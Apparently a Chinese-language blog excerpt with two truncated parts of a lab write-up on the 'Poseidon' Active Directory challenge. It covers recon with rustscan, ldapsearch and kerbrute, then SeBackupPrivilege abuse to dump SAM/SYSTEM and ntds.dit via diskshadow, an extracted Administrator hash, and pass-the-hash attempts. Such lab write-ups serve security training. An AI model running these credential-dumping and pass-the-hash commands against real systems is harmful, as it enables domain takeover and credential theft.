ARIES

 Challenge 8 - Poseidon(1) 檢視 jackie 的權限，whoami /priv 發現有 SeBackupPrivilege 導出 sam & system reg save hklm\sam c:\users\jackie\Documents\sam reg save hklm\system c:\users\jackie\Documents\system └─$ impacket-secretsdump -sam ./sam -system ./system LOCAL Administrator:500:aad3b435b51404eeaad3b435b51404ee:8fea81a19d172de0c445c8072b9a1697:::  使用 impacket-psexec，└─$ impacket-psexec -hashes :8fea81a19d172de0c445c8072b9a1697 administrator@192.168.163.162 evil-winrm，└─$ evil-winrm -i 192.168.163.162 -u Administrator -H 8fea81a19d172de0c445c8072b9a1697 都無法登入 看來要改 COPY ntds.dit 檔案，使用 robocopy 進行複製出現執行中無法複製 參考這一篇 :  https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/ 編輯一個 raj.dsh 檔案如下 set context persistent nowriters add volume c: alias raj create expose %raj% z: 編輯完畢後使用 unix2dos 進行轉換，└─$ unix2dos raj.dsh  建立一個 c:\Temp 資料夾，上傳 raj.dsh 檔案然後執行 diskshadow /s raj.dsh 再複製一次 ntds.dit，使用指令  robocopy /b z:\windows\ntds . ntds. dit 成功複製出來了 依樣抓回 ka...

 Challenge 8 - Poseidon(0) 最近真的新的 LAB 連發，又多了一個 Challenge 8 : Poseidon 剛好近期有空，開來看看吧，又是一個三台的組合，應該又是 AD 題組 跟前一個題組 zeus 很像，都是三台面向使用者沒有內網的機器 ping 看看，看來三台都是 Windows Rustscan 掃掃看，看來第一台一樣是 DC └─$ rustscan -a 192.168.163.161 --scripts none --ulimit 5000 | tee rustscan 第二台看來也像 DC └─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第三台，└─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第一台 161 nmap 資訊 Domain : poseidon.yzx，電腦名稱 dc01 NetBIOS_Domain_Name : poseidon 第二台 162 nmap 資訊 這一台看來是 Sub Domain 的 DC，FQDN: dc02.sub.poseidon.yzx NetBIOS_Domain_Name : sub 第三台 163 nmap 資訊 ldapsearch 161，ldapsearch -v -x -b "DC=poseidon,DC=yzx" -H "ldap://192.168.163.161" "(objectclass=*)" ldapsearch 162，ldapsearch -v -x -b "DC=sub,DC=poseidon,DC=yzx" -H "ldap://192.168.163.162" "(objectclass=*)" 預設 smbclient 列舉都爬不到東西 帶入 poseidon\guest & sub\guest SMB 也都爬不到資訊 爬看看 161 Domain 的使用者，└─$ ./kerbrute_linux_amd64...